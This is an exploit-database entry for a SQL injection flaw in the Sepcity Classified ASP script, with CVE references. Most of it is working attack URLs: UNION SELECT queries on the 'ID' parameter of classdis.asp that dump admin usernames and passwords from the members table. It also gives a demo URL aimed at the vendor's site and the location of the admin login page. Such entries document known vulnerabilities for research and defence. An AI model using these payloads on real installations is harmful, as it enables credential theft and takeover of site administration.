Sepcity Classified - 'ID' SQL Injection
Author: S.W.A.T.
type: webapps
platform: asp
port:
date_added: 2008-12-28
date_updated: 2017-01-10
verified: 1
codes: OSVDB-54016;CVE-2008-6157;OSVDB-51055;CVE-2008-6150
tags:
aliases:
screenshot_url:
application_url:
--==+================================================================================+==--
--==+ Sepcity Classified Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
AUTHOR: S.W.A.T. - Www.BaTLaGH.coM - svvateam@yahoo.com
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-
Site: http://www.sepcity.com/free_classified_software.aspx
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DORK (google): :(
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
DESCRIPTION:
You Can See Admin User & Password In Plaintext
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
EXPLOITS:
for username:
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,username,3%20from%20members
for password:
www.site.com/[path]/classdis.asp?ID=1%20union%20select%200,1,password,3%20from%20members
Online Demo:
http://freeasp.sepcity.com/classifieds/classdis.asp?ID=1%20union%20select%200,1,2,3%20from%20members
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
NOTE/TIP:
Admin Login Is At http://site.com/[path]/admclassifieds.asp
I'll Be A C I D A L !!!
-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
--==+================================================================================+==--
--==+ Sepcity Classified Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--
# milw0rm.com [2008-12-29]